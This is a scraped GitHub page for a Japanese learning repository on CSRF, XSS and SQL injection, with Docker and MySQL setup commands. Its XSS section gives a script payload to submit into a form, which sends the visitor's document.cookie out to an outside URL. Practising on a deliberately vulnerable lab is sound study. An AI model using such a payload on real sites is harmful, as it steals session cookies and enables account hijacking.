GitHub - chida09/csrf-xss-sqlinjection

起動

npx nodemon index.js

dc up -d
dc exec mysql /bin/bash 
mysql -uroot -ptest
use test;
show tables;
select * from users;

+-------------------+
| Tables_in_test_db |
+-------------------+
| users             |
+-------------------+

dc down --volumes

XSS

以下をフォームに入れて送信する

<script type='text/javascript'>document.location='https://www.google.com?cookie=' + document.cookie;</script>

認証方法

Session Authentication

参考

GoogleDoc 脆弱なサイトと罠サイトを実際に作って学ぶ『CSRF』とその対策ホワイトハッカーへの道　三歩目

Name		Name	Last commit message	Last commit date
Latest commit History 15 Commits
initdb.d		initdb.d
views		views
.gitignore		.gitignore
README.md		README.md
docker-compose.yml		docker-compose.yml
index.js		index.js
package-lock.json		package-lock.json
package.json		package.json

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

起動

XSS

認証方法

参考

About

Releases

Packages

Languages

chida09/csrf-xss-sqlinjection

Folders and files

Latest commit

History

Repository files navigation

起動

XSS

認証方法

参考

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages